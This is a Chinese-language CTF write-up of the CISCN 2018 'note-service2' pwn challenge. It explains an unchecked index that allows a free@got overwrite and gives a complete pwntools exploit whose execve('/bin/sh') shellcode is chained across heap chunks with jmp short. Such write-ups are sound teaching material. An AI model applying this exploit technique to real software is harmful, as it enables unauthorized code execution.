CISCN-2018-Quals-note-service2
CISCN-2018-Quals-note-service2
总结
做完这道题,收获如下:
- 1)汇编语句
jmp short s
,最后编译出来的机器码为\xEB\x??
,问号代表pc
寄存器会往前或往后跳转x
个字节,x
的范围为-128~127
。要从??
结束后算起。正数往前跳,负数往回跳。 - 2)修改某个函数的
got
表地址后,可以将目标地址填充为一段shellcode
,如果是在堆上,那么需要借助jmp short
指令。算好偏移。 - 3)
mov rsi, 0
比xor rsi, rsi
要长,尽量用后面的。 - 4)
mov rax, 0x3b
比mov eax, 0x3b
要长,如果长度有限制就用后面的。
Checksec
发现关闭了NX,可能要利用shellcode。
题目分析
首先把附件放在IDA中打开,发现是个菜单题:
main:
sub_E30:
menu:
add_note:
可以看到,没有检查idx是否合法,可以在任意地址写一个对地址。
注意:如果申请的大小为8,最多只能写7个字节。
delete_note:
选项2和选项3并没有什么用。
由于程序关闭了堆栈不可执行,因此可以考虑修改某一个函数got表的内容为堆地址,在堆上写shellcode。
解题思路
尝试的解题思路
-
发现有
UAF
漏洞,看能不能从UAF
入手,泄露出libc
的基地址或程序的基地址。然后,一顿思考后,发现程序没有edit
,没有show
,还只让输入8
个字节,这就有点难搞。所以这个思路不太行。 -
由于在
add_note
中,没有校验输入的idx
,所以是可以修改func@got
的内容的,填充为一个堆地址。但是只让写7
个字节,啥shellcode
会这么短啊······谷歌后,发现一个gadget
叫jmp short
,可以拼接跳转执行,再加上一些滑板指令,就能拼凑出完整的shellcode
。这里需要注意,只让写
7
个字节,所以指令的机器码不能太长,用xor
代替mov
,用mov eax, 0x3b
代替mov rax , 0x3b
。还有jmp short
的机器码是\xEB
,后面直接接一个偏移。偏移要算上后面的8
个字节,加上下一个chunk
的pre_size
和size
,所以一共是1+8+8+8=0x19
。也就是说前面填满5
个字节,接一个\xEB\x19
即可。
最终解题思路
- 1)申请一块内存大小为8,内容
/bin/sh
- 2)修改
free@got
的内容为堆地址 - 3)利用
jmp short s
往连续的几块chunk
写入shellcode
,shellcode
为执行execve
的系统调用。除去pop rdi; ret
。因为free(ptr)
,会自动mov rdi, ptr
。 - 4)调用
delete_note
,释放前面的/bin/sh
的内存块
编写EXP
首先把函数写好:
def add_note(idx:int, size:int, content:bytes=b'\x00'):
global io
io.sendlineafter("your choice>> ", '1')
io.sendlineafter("index:", str(idx))
io.sendlineafter("size:", str(size))
io.sendlineafter("content:", content)
def delete_note(idx:int):
global io
io.sendlineafter("your choice>> ", '4')
io.sendlineafter("index:", str(idx))
首先分配一块带有/bin/sh
的,预备调用。然后,往索引为-17
处分配,修改free@got
的内容为堆地址,顺便写上一条shellcode
,xor rsi, rsi
。这里选用\x0c
作为滑板指令。
add_note(0, 8, b'/bin/sh')
add_note(-17 , 8, asm('xor rsi, rsi') + b'\x0C\x0C\xEB\x19')
-17
的计算是这样的:
可以看到,free@got
的偏移为0x202018
,题目中存储堆地址起始位置为0x2020a0
,所以索引就是(0x202018 - 0x2020a0) // 8 = -17
。
这里给出申请前后free@got
的内容变化:
申请前:
申请后:
可以看到,free@got
已修改成功,同时写上了xor rsi,rsi; \x0c\x0c\xeb\x19
。
然后继续写:
add_note(1, 8, asm('xor rdx, rdx') + b'\x0C\x0C\xEB\x19')
add_note(2, 8, asm('mov eax, 59') + b'\xEB\x19')
add_note(4, 8, asm('syscall'))
之后就会:
最后:
delete_note(0) # get shell
完整exp
from pwn import *
io = process('./note')
context.update(arch='amd64', os='linux', endian='little')
def add_note(idx:int, size:int, content:bytes=b'\x00'):
global io
io.sendlineafter("your choice>> ", '1')
io.sendlineafter("index:", str(idx))
io.sendlineafter("size:", str(size))
io.sendlineafter("content:", content)
def delete_note(idx:int):
global io
io.sendlineafter("your choice>> ", '4')
io.sendlineafter("index:", str(idx))
# 利用 jmp short s指令写shellcode
# 修改free@got处地址为堆地址
add_note(0, 8, b'/bin/sh')
add_note(-17 , 8, asm('xor rsi, rsi') + b'\x0C\x0C\xEB\x19')
add_note(1, 8, asm('xor rdx, rdx') + b'\x0C\x0C\xEB\x19')
add_note(2, 8, asm('mov eax, 59') + b'\xEB\x19')
add_note(4, 8, asm('syscall'))
delete_note(0)
io.interactive()
本文来自博客园,作者:LynneHuan,转载请注明原文链接:https://www.cnblogs.com/LynneHuan/p/14427269.html